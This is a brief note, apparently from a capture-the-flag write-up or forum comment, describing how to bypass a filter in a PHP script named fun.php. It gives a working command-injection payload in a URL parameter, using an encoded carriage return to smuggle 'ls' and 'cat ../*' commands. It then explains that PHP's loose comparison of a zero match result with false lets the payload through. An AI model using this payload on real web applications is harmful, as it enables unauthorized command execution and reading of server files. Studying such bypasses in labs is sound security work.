I use %0d(\n) to bypass, like this
`fun.php?string=%0dls;cat%20../*;%23 `

`ls` match at the first get a return of zero. In php, `0==false` return True.